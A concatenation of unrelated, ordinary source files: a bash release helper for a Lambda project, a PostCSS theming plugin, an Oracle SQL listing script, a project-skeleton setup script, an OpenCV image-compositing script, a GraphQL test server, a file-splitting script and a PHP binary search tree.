    print_completed
}

#####################################################################
## Beginning of the helper methods ##################################
export_version() {
    if [ ! -f ".version" ]; then
        echo ".version file not found! Have you run prepare_release command?"
        exit 1
    fi
    export VERSION=$(cat .version)
}

help() {
    echo "$0 Provides set of commands to assist you with day-to-day tasks when working in this project"
    echo
    echo "Available commands:"
    echo -e " - assemble\t\t\t Prepare dependencies and build the Lambda function code using SAM"
    echo -e " - prepare_release\t\t Bump the function's version when appropriate"
    echo -e " - publish\t\t\t Package and share artifacts by running assemble, publish_artifacts_to_s3, rename_artifacts_in_s3 and publish_checksum_file commands"
    echo -e " - publish_artifacts_to_s3\t Uses SAM to Package and upload artifacts to ${S3_ADDRESS}"
    echo -e " - publish_checksum_file\t Generate a checksum for the artifacts zip file and store in the same S3 location (${S3_LAMBDA_SUB_FOLDER})"
    echo -e " - rename_artifacts_in_s3\t Rename the artifact published by SAM to ${S3_ADDRESS} to expected, versioned file name"
    echo -e " - cut_release\t\t Creates a release tag in the repository"
    echo
}

print_begins() {
    echo -e "\n-------------------------------------------------"
    echo -e ">>> ${FUNCNAME[1]} Begins\n"
}

print_completed() {
    echo -e "\n### ${FUNCNAME[1]} Completed!"
    echo -e "-------------------------------------------------"
}

print_configs() {
    echo -e "BASE_LOCATION:\t\t\t${BASE_LOCATION}"
    echo -e "PROJECT_FULL_NAME:\t\t${PROJECT_FULL_NAME}"
    echo -e "PROJECT_NAME:\t\t\t${PROJECT_NAME}"
    echo
    echo -e "PATH_BUILD:\t\t\t${PATH_BUILD}"
    echo -e "PATH_CF_TEMPLATE:\t\t${PATH_CF_TEMPLATE}"
    echo -e "PATH_SAM_RESOURCES:\t\t${PATH_SAM_RESOURCES}"
    echo
    echo -e "S3_TELEMETRY_LAMBDA_ROOT:\t${S3_TELEMETRY_LAMBDA_ROOT}"
    echo -e "S3_LAMBDA_SUB_FOLDER:\t\t${S3_LAMBDA_SUB_FOLDER}"
    echo -e "S3_ADDRESS:\t\t\t${S3_ADDRESS}"
}
## End of the helper methods ########################################
#####################################################################

#####################################################################
## Beginning of the Entry point #####################################
main() {
    # Validate command arguments
    [ "$#" -ne 1 ] && help && exit 1

    function="$1"
    # Fixed: the whitelist previously contained "publish_s3" and
    # "rename_s3_file", which do not exist; the real commands
    # publish_artifacts_to_s3 and rename_artifacts_in_s3 (listed in help)
    # were therefore impossible to invoke from the CLI.
    functions="help assemble publish_artifacts_to_s3 rename_artifacts_in_s3 publish publish_checksum_file prepare_release print_configs cut_release"
    [[ $functions =~ (^|[[:space:]])"$function"($|[[:space:]]) ]] || (echo -e "\n\"$function\" is not a valid command. Try \"$0 help\" for more details" && exit 2)

    $function
}

main "$@"
## End of the Entry point ###########################################
#####################################################################
<gh_stars>100-1000 import { minifyJSON } from './helpers/json.util'; import { minifyCSS } from './helpers/css.util'; const postcss = require('postcss'); const fs = require('fs-extra'); const THEMIFY = 'themify'; const JSToSass = require('./helpers/js-sass'); export interface ThemifyOptions { /** * Whether we would like to generate the CSS variables. * This should be true, unless you want to inject them yourself. */ createVars: boolean; /** * Palette configuration */ palette: any; /** * A class prefix to append to the generated themes classes */ classPrefix: string; /** * Whether to generate a fallback for legacy browsers (ahm..ahm..) that do not supports CSS Variables */ screwIE11: boolean; /** * Legacy browser fallback */ fallback: { /** * An absolute path to the fallback CSS. */ cssPath: string | null; /** * An absolute path to the fallback JSON. * This file contains variable that will be replace in runtime, for legacy browsers */ dynamicPath: string | null; }; } const defaultOptions: ThemifyOptions = { createVars: true, palette: {}, classPrefix: '', screwIE11: true, fallback: { cssPath: null, dynamicPath: null } }; /** supported color variations */ const ColorVariation = { DARK: 'dark', LIGHT: 'light' }; function buildOptions(options: ThemifyOptions) { if (!options) { throw new Error(`options is required.`); } // make sure we have a palette if (!options.palette) { throw new Error(`The 'palette' option is required.`); } return { ...defaultOptions, ...options }; } /** * * @param {string} filePath * @param {string} output * @returns {Promise<any>} */ function writeToFile(filePath: string, output: string) { return fs.outputFile(filePath, output); } /** * Get the rgba as 88, 88, 33 instead rgba(88, 88, 33, 1) * @param value */ function getRgbaNumbers(value: string) { return hexToRgba(value) .replace('rgba(', '') .replace(', 1)', ''); } /** Define the default variation */ const defaultVariation = ColorVariation.LIGHT; /** An array of variation values */ const 
variationValues: string[] = (Object as any).values(ColorVariation); /** An array of all non-default variations */ const nonDefaultVariations: string[] = variationValues.filter(v => v !== defaultVariation); function themify(options: ThemifyOptions) { /** Regex to get the value inside the themify parenthesis */ const themifyRegExp = /themify\(([^)]+)\)/gi; /** * Define the method of color execution */ const enum ExecutionMode { CSS_VAR = 'CSS_VAR', CSS_COLOR = 'CSS_COLOR', DYNAMIC_EXPRESSION = 'DYNAMIC_EXPRESSION' } options = buildOptions(options); return root => { // process fallback CSS, without mutating the rules if (options.screwIE11 === false) { processFallbackRules(root); } // mutate the existing rules processRules(root); }; /** * @example themify({"light": ["primary-0", 0.5], "dark": "primary-700"}) * @example themify({"light": "primary-0", "dark": "primary-700"}) * @example linear-gradient(themify({"color": "primary-200", "opacity": "1"}), themify({"color": "primary-300", "opacity": "1"})) * @example themify({"light": ["primary-100", "1"], "dark": ["primary-100", "1"]}) * @example 1px solid themify({"light": ["primary-200", "1"], "dark": ["primary-200", "1"]}) */ function getThemifyValue(propertyValue: string, execMode: ExecutionMode): { [variation: string]: string } { /** Remove the start and end ticks **/ propertyValue = propertyValue.replace(/'/g, ''); const colorVariations = {}; function normalize(value, variationName) { let parsedValue; try { parsedValue = JSON.parse(value); } catch (ex) { throw new Error(`fail to parse the following expression: ${value}.`); } const currentValue = parsedValue[variationName]; /** For example: background-color: themify((light: primary-100)); */ if (!currentValue) { throw new Error(`${value} has one variation.`); } // convert to array if (!Array.isArray(currentValue)) { // color, alpha parsedValue[variationName] = [currentValue, 1]; } else if (!currentValue.length || !currentValue[0]) { throw new Error('Oops. 
Received an empty color!'); } if (options.palette) return parsedValue[variationName]; } // iterate through all variations variationValues.forEach(variationName => { // replace all 'themify' tokens with the right string colorVariations[variationName] = propertyValue.replace(themifyRegExp, (occurrence, value) => { // parse and normalize the color const parsedColor = normalize(value, variationName); // convert it to the right format return translateColor(parsedColor, variationName, execMode); }); }); return colorVariations; } /** * Get the underline color, according to the execution mode * @param colorArr two sized array with the color and the alpha * @param variationName the name of the variation. e.g. light / dark * @param execMode */ function translateColor(colorArr: [string, string], variationName: string, execMode: ExecutionMode) { const [colorVar, alpha] = colorArr; // returns the real color representation const underlineColor = options.palette[variationName][colorVar]; if (!underlineColor) { // variable is not mandatory in non-default variations if (variationName !== defaultVariation) { return null; } throw new Error(`The variable name '${colorVar}' doesn't exists in your palette.`); } switch (execMode) { case ExecutionMode.CSS_COLOR: // with default alpha - just returns the color if (alpha === '1') { return underlineColor; } // with custom alpha, convert it to rgba const rgbaColorArr = getRgbaNumbers(underlineColor); return `rgba(${rgbaColorArr}, ${alpha})`; case ExecutionMode.DYNAMIC_EXPRESSION: // returns it in a unique pattern, so it will be easy to replace it in runtime return `%[${variationName}, ${colorVar}, ${alpha}]%`; default: // return an rgba with the CSS variable name return `rgba(var(--${colorVar}), ${alpha})`; } } /** * Walk through all rules, and replace each themify occurrence with the corresponding CSS variable. 
* @example background-color: themify(primary-300, 0.5) => background-color: rgba(var(--primary-300),0.6) * @param root */ function processRules(root) { root.walkRules(rule => { if (!hasThemify(rule.toString())) { return; } let aggragatedSelectorsMap = {}; let aggragatedSelectors: string[] = []; let createdRules: any[] = []; const variationRules = { [defaultVariation]: rule }; rule.walkDecls(decl => { const propertyValue = decl.value; if (!hasThemify(propertyValue)) return; const property = decl.prop; const variationValueMap = getThemifyValue(propertyValue, ExecutionMode.CSS_VAR); const defaultVariationValue = variationValueMap[defaultVariation]; decl.value = defaultVariationValue; // indicate if we have a global rule, that cannot be nested const createNonDefaultVariationRules = isAtRule(rule); // don't create extra CSS for global rules if (createNonDefaultVariationRules) { return; } // create a new declaration and append it to each rule nonDefaultVariations.forEach(variationName => { const currentValue = variationValueMap[variationName]; // variable for non-default variation is optional if (!currentValue || currentValue === 'null') { return; } // when the declaration is the same as the default variation, // we just need to concatenate our selector to the default rule if (currentValue === defaultVariationValue) { const selector = getSelectorName(rule, variationName); // append the selector once if (!aggragatedSelectorsMap[variationName]) { aggragatedSelectorsMap[variationName] = true; aggragatedSelectors.push(selector); } } else { // creating the rule for the first time if (!variationRules[variationName]) { const clonedRule = createRuleWithVariation(rule, variationName); variationRules[variationName] = clonedRule; // append the new rule to the array, so we can append it later createdRules.push(clonedRule); } const variationDecl = createDecl(property, variationValueMap[variationName]); variationRules[variationName].append(variationDecl); } }); }); if 
(aggragatedSelectors.length) { rule.selectors = [...rule.selectors, ...aggragatedSelectors]; } // append each created rule if (createdRules.length) { createdRules.forEach(r => root.append(r)); } }); } /** * indicate if we have a global rule, that cannot be nested * @param rule * @return {boolean} */ function isAtRule(rule) { return rule.parent && rule.parent.type === 'atrule'; } /** * Walk through all rules, and generate a CSS fallback for legacy browsers. * Two files shall be created for full compatibility: * 1. A CSS file, contains all the rules with the original color representation. * 2. A JSON with the themify rules, in the following form: * themify(primary-100, 0.5) => %[light,primary-100,0.5)% * @param root */ function processFallbackRules(root) { // an output for each execution mode const output = { [ExecutionMode.CSS_COLOR]: [], [ExecutionMode.DYNAMIC_EXPRESSION]: {} }; // initialize DYNAMIC_EXPRESSION with all existing variations variationValues.forEach(variation => (output[ExecutionMode.DYNAMIC_EXPRESSION][variation] = [])); // define which modes need to be processed const execModes = [ExecutionMode.CSS_COLOR, ExecutionMode.DYNAMIC_EXPRESSION]; walkFallbackAtRules(root, execModes, output); walkFallbackRules(root, execModes, output); writeFallbackCSS(output); } function writeFallbackCSS(output) { // write the CSS & JSON to external files if (output[ExecutionMode.CSS_COLOR].length) { // write CSS fallback; const fallbackCss = output[ExecutionMode.CSS_COLOR].join(''); writeToFile(options.fallback.cssPath as string, minifyCSS(fallbackCss)); // creating a JSON for the dynamic expressions const jsonOutput = {}; variationValues.forEach(variationName => { jsonOutput[variationName] = output[ExecutionMode.DYNAMIC_EXPRESSION][variationName] || []; jsonOutput[variationName] = minifyJSON(jsonOutput[variationName].join('')); // minify the CSS output jsonOutput[variationName] = minifyCSS(jsonOutput[variationName]); }); // stringify and save const dynamicCss = 
JSON.stringify(jsonOutput); writeToFile(options.fallback.dynamicPath as string, dynamicCss); } } function walkFallbackAtRules(root, execModes, output) { root.walkAtRules(atRule => { if (atRule.nodes && hasThemify(atRule.toString())) { execModes.forEach(mode => { const clonedAtRule = atRule.clone(); clonedAtRule.nodes.forEach(rule => { rule.walkDecls(decl => { const propertyValue = decl.value; // replace the themify token, if exists if (hasThemify(propertyValue)) { const colorMap = getThemifyValue(propertyValue, mode); decl.value = colorMap[defaultVariation]; } }); }); let rulesOutput = mode === ExecutionMode.DYNAMIC_EXPRESSION ? output[mode][defaultVariation] : output[mode]; rulesOutput.push(clonedAtRule); }); } }); } function walkFallbackRules(root, execModes, output) { root.walkRules(rule => { if (isAtRule(rule) || !hasThemify(rule.toString())) { return; } const ruleModeMap = {}; rule.walkDecls(decl => { const propertyValue = decl.value; if (!hasThemify(propertyValue)) return; const property = decl.prop; execModes.forEach(mode => { const colorMap = getThemifyValue(propertyValue, mode); // lazily creating a new rule for each variation, for the specific mode if (!ruleModeMap.hasOwnProperty(mode)) { ruleModeMap[mode] = {}; variationValues.forEach(variationName => { let newRule; if (variationName === defaultVariation) { newRule = cloneEmptyRule(rule); } else { newRule = createRuleWithVariation(rule, variationName); } // push the new rule into the right place, // so we can write them later to external file let rulesOutput = mode === ExecutionMode.DYNAMIC_EXPRESSION ? 
output[mode][variationName] : output[mode]; rulesOutput.push(newRule); ruleModeMap[mode][variationName] = newRule; }); } // create and append a new declaration variationValues.forEach(variationName => { const underlineColor = colorMap[variationName]; if (underlineColor && underlineColor !== 'null') { const newDecl = createDecl(property, colorMap[variationName]); ruleModeMap[mode][variationName].append(newDecl); } }); }); }); }); } function createDecl(prop, value) { return postcss.decl({ prop, value }); } /** * check if there's a themify keyword in this declaration * @param propertyValue */ function hasThemify(propertyValue) { return propertyValue.indexOf(THEMIFY) > -1; } /** * Create a new rule for the given variation, out of the original rule * @param rule * @param variationName */ function createRuleWithVariation(rule, variationName) { const selector = getSelectorName(rule, variationName); return postcss.rule({ selector }); } /** * Get a selector name for the given rule and variation * @param rule * @param variationName */ function getSelectorName(rule, variationName) { const selectorPrefix = `.${options.classPrefix || ''}${variationName}`; return rule.selectors .map(selector => { return `${selectorPrefix} ${selector}`; }) .join(','); } function cloneEmptyRule(rule, overrideConfig?) { const clonedRule = rule.clone(overrideConfig); // remove all the declaration from this rule clonedRule.removeAll(); return clonedRule; } } /** * Generating a SASS definition file with the palette map and the CSS variables. * This file should be injected into your bundle. */ function init(options) { options = buildOptions(options); return root => { const palette = options.palette; const css = generateVars(palette, options.classPrefix); const parsedCss = postcss.parse(css); root.prepend(parsedCss); }; /** * This function responsible for creating the CSS variable. 
* * The output should look like the following: * * .light { --primary-700: 255, 255, 255; --primary-600: 248, 248, 249; --primary-500: 242, 242, 244; * } * * .dark { --primary-700: 255, 255, 255; --primary-600: 248, 248, 249; --primary-500: 242, 242, 244; * } * */ function generateVars(palette, prefix) { let cssOutput = ''; prefix = prefix || ''; // iterate through the different variations Object.keys(palette).forEach(variationName => { const selector = variationName === ColorVariation.LIGHT ? ':root' : `.${prefix}${variationName}`; const variationColors = palette[variationName]; // make sure we got colors for this variation if (!variationColors) { throw new Error(`Expected map of colors for the variation name ${variationName}`); } const variationKeys = Object.keys(variationColors); // generate CSS variables const vars = variationKeys .map(varName => { return `--${varName}: ${getRgbaNumbers(variationColors[varName])};`; }) .join(' '); // concatenate the variables to the output const output = `${selector} {${vars}}`; cssOutput = `${cssOutput} ${output}`; }); // generate the $palette variable cssOutput += `$palette: ${JSToSass(palette)};`; return cssOutput; } } function hexToRgba(hex, alpha = 1): string { hex = hex.replace('#', ''); const r = parseInt(hex.length == 3 ? hex.slice(0, 1).repeat(2) : hex.slice(0, 2), 16); const g = parseInt(hex.length == 3 ? hex.slice(1, 2).repeat(2) : hex.slice(2, 4), 16); const b = parseInt(hex.length == 3 ? hex.slice(2, 3).repeat(2) : hex.slice(4, 6), 16); return 'rgba(' + r + ', ' + g + ', ' + b + ', ' + alpha + ')'; } module.exports = { initThemify: postcss.plugin('datoThemes', init), themify: postcss.plugin('datoThemes', themify) };
-- ***************************************************************************
-- File:         11_3.sql
--
-- Developed By  TUSC
--
-- Disclaimer:   Neither Osborne/McGraw-Hill, TUSC, nor the author warrant
--               that this source code is error-free.  If any errors are
--               found in this source code, please report them to TUSC at
--               (630)960-2909 ext 1011 or <EMAIL>.
-- ***************************************************************************

-- Capture the query output in a listing file alongside the script.
SPOOL 11_3.lis

-- List every package owned by SYS, alphabetically.
-- Requires SELECT privilege on DBA_OBJECTS (e.g. the DBA role).
SELECT object_name from dba_objects
WHERE owner = 'SYS'
AND object_type = 'PACKAGE'
ORDER BY object_name;

SPOOL OFF
#!/bin/sh # The MIT License # # Copyright (c) 2016 Jérémie DECOCK <jd.jdhp@gmail.com> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # SAFETY TESTS ################################################################ # TODO: assert "$(dirname "$0") == "$(pwd)" # ... # LOAD VARIABLES ############################################################## . 
./meta.sh echo "AUTHOR_NAME: ${AUTHOR_NAME}" echo "AUTHOR_EMAIL: ${AUTHOR_EMAIL}" echo "AUTHOR_WEB_SITE: ${AUTHOR_WEB_SITE}" echo "COPYRIGHT_NOTICE: ${COPYRIGHT_NOTICE}" echo "PROJECT_INITIAL_DATE: ${PROJECT_INITIAL_DATE}" echo "PROJECT_SHORT_DESC: ${PROJECT_SHORT_DESC}" echo "PROJECT_NAME: ${PROJECT_NAME}" echo "PYTHON_PACKAGE_NAME: ${PYTHON_PACKAGE_NAME}" echo "PROJECT_GITHUB_ACCOUNT: ${PROJECT_GITHUB_ACCOUNT}" echo "PROJECT_GITHUB_REPOSITORY_NAME: ${PROJECT_GITHUB_REPOSITORY_NAME}" echo "PROJECT_GITHUB_URL ${PROJECT_GITHUB_URL}" echo "PROJECT_ISSUE_TRACKER_URL: ${PROJECT_ISSUE_TRACKER_URL}" echo "PROJECT_PYPI_URL: ${PROJECT_PYPI_URL}" echo "PROJECT_WEB_SITE_URL: ${PROJECT_WEB_SITE_URL}" echo "PROJECT_ONLINE_DOCUMENTATION_URL: ${PROJECT_ONLINE_DOCUMENTATION_URL}" echo "PROJECT_ONLINE_API_DOCUMENTATION_URL: ${PROJECT_ONLINE_API_DOCUMENTATION_URL}" # SETUP GIT ################################################################### #git remote rename origin skeleton #git remote add origin git@github.com:${PROJECT_GITHUB_ACCOUNT}/${PROJECT_GITHUB_REPOSITORY_NAME}.git #git push -u origin master #git submodule init #git submodule update # MAKE SUBSTITUTIONS ########################################################## sed -i "" \ -e "s/TODO_AUTHOR_NAME/${AUTHOR_NAME}/g" \ -e "s/TODO_AUTHOR_EMAIL/${AUTHOR_EMAIL}/g" \ -e "s TODO_AUTHOR_WEB_SITE ${AUTHOR_WEB_SITE} g" \ -e "s|TODO_COPYRIGHT_NOTICE|${COPYRIGHT_NOTICE}|g" \ -e "s|TODO_PROJECT_INITIAL_DATE|${PROJECT_INITIAL_DATE}|g" \ -e "s|TODO_PROJECT_SHORT_DESC|${PROJECT_SHORT_DESC}|g" \ -e "s;TODO_PROJECT_NAME;${PROJECT_NAME};g" \ -e "s/TODO_PYTHON_PACKAGE_NAME/${PYTHON_PACKAGE_NAME}/g" \ -e "s/TODO_PROJECT_GITHUB_ACCOUNT/${PROJECT_GITHUB_ACCOUNT}/g" \ -e "s/TODO_PROJECT_GITHUB_REPOSITORY_NAME/${PROJECT_GITHUB_REPOSITORY_NAME}/g" \ -e "s TODO_PROJECT_GITHUB_URL ${PROJECT_GITHUB_URL} g" \ -e "s TODO_PROJECT_ISSUE_TRACKER_URL ${PROJECT_ISSUE_TRACKER_URL} g" \ -e "s TODO_PROJECT_PYPI_URL ${PROJECT_PYPI_URL} g" \ -e "s 
TODO_PROJECT_WEB_SITE_URL ${PROJECT_WEB_SITE_URL} g" \ -e "s TODO_PROJECT_ONLINE_DOCUMENTATION_URL ${PROJECT_ONLINE_DOCUMENTATION_URL} g" \ -e "s TODO_PROJECT_ONLINE_API_DOCUMENTATION_URL ${PROJECT_ONLINE_API_DOCUMENTATION_URL} g" \ AUTHORS \ CHANGES.rst \ .gitlab-ci.yml \ .travis.yml \ environment.yml \ LICENSE \ meta.make \ README.rst \ setup.cfg \ docs/api.rst \ docs/conf.py \ docs/developer.rst \ docs/index.rst \ docs/init_sphinx.sh \ docs/intro.rst \ docs/make.bat \ docs/Makefile \ TODO_PYTHON_PACKAGE_NAME/__init__.py # FIX TITLES UNDERLINE LENGTH IN RESTRUCTUREDTEXT FILES ####################### PROJECT_NAME_UNDERLINE=$(echo "${PROJECT_NAME}" | tr '[:print:]' '=') sed -i "" \ -e "s/^====$/${PROJECT_NAME_UNDERLINE}/" \ README.rst sed -i "" \ -e "s/^====$/${PROJECT_NAME_UNDERLINE}/" \ docs/index.rst # RENAME THE ROOT PACKAGE DIRECTORY ########################################### mv -v TODO_PYTHON_PACKAGE_NAME "${PYTHON_PACKAGE_NAME}"
import cv2
import numpy as np
from random import randint

path_FG_BG = 'Output/FG_BG'
path_mask_FG_BG = 'Output/mask_FG_BG'

# Top-left corners of the four 100x100 quadrants of a 200x200 background.
# (Index order: bottom-right, bottom-left, top-right, top-left.)
quadrantsX = [100, 0, 100, 0]
quadrantsY = [100, 100, 0, 0]


def overlay_transparent(mainimage, overlay, x, y):
    """Alpha-blend ``overlay`` onto a copy of ``mainimage`` at (x, y).

    Returns a ``(composited, mask)`` pair.  ``mask`` is a uint8 image with the
    background's shape that is white (scaled by the overlay's alpha) wherever
    the overlay was painted and black elsewhere.

    If (x, y) falls outside the background, the untouched copy and an all-black
    mask are returned.  An overlay that would stick out past the right/bottom
    edge is shifted back inside rather than cropped.
    """
    background = mainimage.copy()
    background_height, background_width = background.shape[:2]
    # BUGFIX: the mask must share the background's (height, width) layout; the
    # original allocated (width, height), which only worked for square images.
    maskBG = np.zeros(
        [background_height, background_width, background.shape[2]], dtype=np.uint8
    )
    if x >= background_width or y >= background_height:
        # BUGFIX: always return the (image, mask) pair so callers can unpack.
        return background, maskBG
    h, w = overlay.shape[0], overlay.shape[1]
    # Shift the overlay back inside the frame instead of cropping it.
    # NOTE(review): assumes the overlay is no larger than the background in
    # either dimension — otherwise x/y go negative; TODO confirm with callers.
    if x + w > background_width:
        x = background_width - w
        overlay = overlay[:, :w]
    if y + h > background_height:
        y = background_height - h
        overlay = overlay[:h]
    if overlay.shape[2] < 4:
        # Synthesize a fully-opaque alpha channel for 3-channel overlays.
        overlay = np.concatenate(
            [
                overlay,
                np.ones((overlay.shape[0], overlay.shape[1], 1), dtype=overlay.dtype) * 255,
            ],
            axis=2,
        )
    overlay_image = overlay[..., :3]
    mask = overlay[..., 3:] / 255.0  # per-pixel alpha in [0, 1]
    background[y:y + h, x:x + w] = (
        (1.0 - mask) * background[y:y + h, x:x + w] + mask * overlay_image
    )
    maskBG[y:y + h, x:x + w] = (1.0 - mask) * maskBG[y:y + h, x:x + w] + mask * 255
    return background, maskBG


def _compose_and_save(backgound, fg_img_tiny, x, y, opDir, imageNo):
    """Overlay the foreground at (x, y), write the composite and its greyscale
    mask as ``<opDir>/overlay/<n>.jpg`` / ``<opDir>/mask/<n>.jpg``, and return
    the incremented image counter."""
    fg_bg, masked = overlay_transparent(backgound, fg_img_tiny, x, y)
    imageNo = imageNo + 1
    mask_grey = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY)
    cv2.imwrite(opDir + '/overlay/' + str(imageNo) + ".jpg", fg_bg)
    cv2.imwrite(opDir + '/mask/' + str(imageNo) + ".jpg", mask_grey)
    return imageNo


def _random_quadrant_xy(fg_img_tiny, i):
    """Random (x, y) inside quadrant ``i % 4`` that keeps a small foreground
    roughly within that 100x100 quadrant."""
    x = randint(quadrantsX[i % 4], quadrantsX[i % 4] + 99 - (fg_img_tiny.shape[0] % 99))
    y = randint(quadrantsY[i % 4], quadrantsY[i % 4] + 99 - (fg_img_tiny.shape[1] % 99))
    return x, y


def _centre_xy(fg_img_tiny):
    """(x, y) that centres the foreground on a 200x200 background."""
    return 100 - int(fg_img_tiny.shape[0] / 2), 100 - int(fg_img_tiny.shape[1] / 2)


def makeCombinations(backgound, foreground, opDir, imageNo):
    """Generate 20 foreground-on-background composites at several scales
    (1.0, 0.8, 0.6, 0.5, 0.3) and random/centred placements, writing each
    composite and its mask under ``opDir``.  Returns the final image counter.

    NOTE(review): cv2.resize takes dsize as (width, height) but is fed
    (shape[0], shape[1]) = (height, width) throughout — harmless only for
    square foregrounds; TODO confirm inputs are square.
    """
    # Full size: two placements anywhere on the image.
    fg_img_tiny = cv2.resize(
        foreground, (foreground.shape[0], foreground.shape[1]),
        interpolation=cv2.INTER_AREA,
    )
    for i in range(0, 2):
        x = randint(0, 199 - (fg_img_tiny.shape[0] % 199))
        y = randint(0, 199 - (fg_img_tiny.shape[1] % 199))
        imageNo = _compose_and_save(backgound, fg_img_tiny, x, y, opDir, imageNo)

    # 80% scale: one random placement per quadrant.
    fg_img_tiny = cv2.resize(
        foreground, (int(0.8 * foreground.shape[0]), int(0.8 * foreground.shape[1])),
        interpolation=cv2.INTER_AREA,
    )
    for i in range(0, 4):
        x, y = _random_quadrant_xy(fg_img_tiny, i)
        imageNo = _compose_and_save(backgound, fg_img_tiny, x, y, opDir, imageNo)

    # 60% scale: five random quadrant placements plus one centred.
    fg_img_tiny = cv2.resize(
        foreground, (int(0.6 * foreground.shape[0]), int(0.6 * foreground.shape[1])),
        interpolation=cv2.INTER_AREA,
    )
    for i in range(0, 5):
        x, y = _random_quadrant_xy(fg_img_tiny, i)
        imageNo = _compose_and_save(backgound, fg_img_tiny, x, y, opDir, imageNo)
    x, y = _centre_xy(fg_img_tiny)
    imageNo = _compose_and_save(backgound, fg_img_tiny, x, y, opDir, imageNo)

    # 50% scale: five random quadrant placements plus one centred.
    fg_img_tiny = cv2.resize(
        foreground, (int(0.5 * foreground.shape[0]), int(0.5 * foreground.shape[1])),
        interpolation=cv2.INTER_AREA,
    )
    for i in range(0, 5):
        x, y = _random_quadrant_xy(fg_img_tiny, i)
        imageNo = _compose_and_save(backgound, fg_img_tiny, x, y, opDir, imageNo)
    x, y = _centre_xy(fg_img_tiny)
    imageNo = _compose_and_save(backgound, fg_img_tiny, x, y, opDir, imageNo)

    # 30% scale: two random quadrant placements.
    fg_img_tiny = cv2.resize(
        foreground, (int(0.3 * foreground.shape[0]), int(0.3 * foreground.shape[1])),
        interpolation=cv2.INTER_AREA,
    )
    for i in range(0, 2):
        x, y = _random_quadrant_xy(fg_img_tiny, i)
        imageNo = _compose_and_save(backgound, fg_img_tiny, x, y, opDir, imageNo)
    return imageNo


if __name__ == "__main__":
    # NOTE(review): this section is a notebook export ("%matplotlib inline"
    # removed — it is not valid Python outside IPython).  Guarding it behind
    # __main__ fixes the syntax error and keeps the module importable without
    # touching the filesystem at import time.
    from os import listdir
    import os, errno
    from DenseDepth.EVADepth import denseDepthModel
    from matplotlib.pyplot import imshow
    from PIL import Image

    path_BG = 'bg'
    path_FG = 'fg150'
    bg_imageListDir = listdir(path_BG)
    fg_imageListDir = listdir(path_FG)
    print(len(bg_imageListDir))
    for bg_image in bg_imageListDir:
        print(bg_image)
        outputDir = 'Dataset/' + bg_image[:-4]
        bg_img = Image.open(path_BG + '/' + bg_image).resize((224, 224), Image.ANTIALIAS)
        print(bg_img.size)
        for fg_image in fg_imageListDir:
            fg_img = Image.open(path_FG + '/' + fg_image).resize((224, 224), Image.ANTIALIAS)
            break
        break
        # Original (disabled) generation pipeline, kept for reference:
        # outputDir1 = outputDir + '/' + fg_image[:-4]
        # try:
        #     os.makedirs(outputDir1 + "/overlay")
        #     os.makedirs(outputDir1 + "/mask")
        #     os.makedirs(outputDir1 + "/depth")
        # except FileExistsError:
        #     pass
        # makeCombinations(bg_img, fg_img, outputDir1, 0)
        # # Flip foreground
        # fg_img_flip = cv2.flip(fg_img, 1)
        # makeCombinations(bg_img, fg_img_flip, outputDir1, 20)
        # denseDepthModel(model, outputDir1 + '/overlay/*.jpg', outputDir1 + '/depth/')
import { ApolloServer } from 'apollo-server'; import { GraphQLSchema } from 'graphql'; import { defaultTestSchema } from './graphql-http-test-schema'; export class GraphQLHTTPTestEndpoint { private server: ApolloServer | undefined; public async start(port: number, schema?: GraphQLSchema) { const server = new ApolloServer({ schema: schema || defaultTestSchema }); await server.listen(port); console.log(`Test endpoint running on http://localhost:${port}/`) this.server = server; } public stop() { if (this.server) { this.server.stop(); this.server = undefined; } } }
#!/bin/bash
# Shuffle the input file in place, then deal its lines round-robin into
# twelve files named <file>_0 .. <file>_11.
#
# Usage: split12.sh <file>
#
# BUGFIX: $1 was unquoted throughout (breaks on paths with spaces) and the
# C-style for-loop requires bash, so a bash shebang is declared explicitly.
shuf "$1" > "$1.shuf"
mv "$1.shuf" "$1"
for ((i = 0; i < 12; i++))
do
    # NR%12==i keeps every 12th line starting at offset i; i is handed to awk
    # as a command-line variable assignment.
    awk 'NR%12==i' i="$i" "$1" > "${1}_${i}"
done
<?php

/**
 * A balanced binary search tree constructed from a sorted array.
 */
class BinarySearchTree
{
    private $root;
    private $currNode;

    /**
     * @param array $arr element values in ascending order
     */
    public function __construct($arr)
    {
        $this->root = $this->createTree($arr);
    }

    /**
     * Recursively builds a balanced subtree: the middle element becomes the
     * subtree root, the left half feeds the left child and the right half
     * the right child.
     *
     * @param array $arr sorted slice to convert
     * @return Node|null root of the subtree, or null for an empty slice
     */
    private function createTree($arr)
    {
        $length = count($arr);
        if ($length == 0) {
            return null;
        }
        $middle = $length >> 1;
        $subtreeRoot = new Node($arr[$middle]);
        $subtreeRoot->leftNode = $this->createTree(array_slice($arr, 0, $middle));
        $subtreeRoot->rightNode = $this->createTree(array_slice($arr, $middle + 1));
        return $subtreeRoot;
    }
}

/**
 * A single tree node: a value plus left/right child links.
 */
class Node
{
    public $data;
    public $leftNode;
    public $rightNode;

    public function __construct($data)
    {
        $this->data = $data;
        $this->leftNode = null;
        $this->rightNode = null;
    }
}

$arr = [2, 4, 8, 10, 12, 14];
$bst = new BinarySearchTree($arr);
?>
# Evaluate the "1024+0+512-shuffled-N-VB" checkpoint (epoch 7) on the
# WikiText-103 validation set, using the augmented data pipeline
# (nouns replaced in the first two-thirds-sixth) and scoring only the
# penultimate sixth of each sequence.  Batch size 1; incomplete final
# batch dropped.
